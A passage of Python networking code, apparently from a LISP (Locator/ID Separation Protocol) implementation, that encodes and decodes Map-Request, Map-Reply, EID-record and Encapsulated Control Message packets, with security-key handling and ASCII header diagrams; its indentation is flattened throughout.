if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
while (self.itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = socket.ntohs(afi)
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
else:
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsualted Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
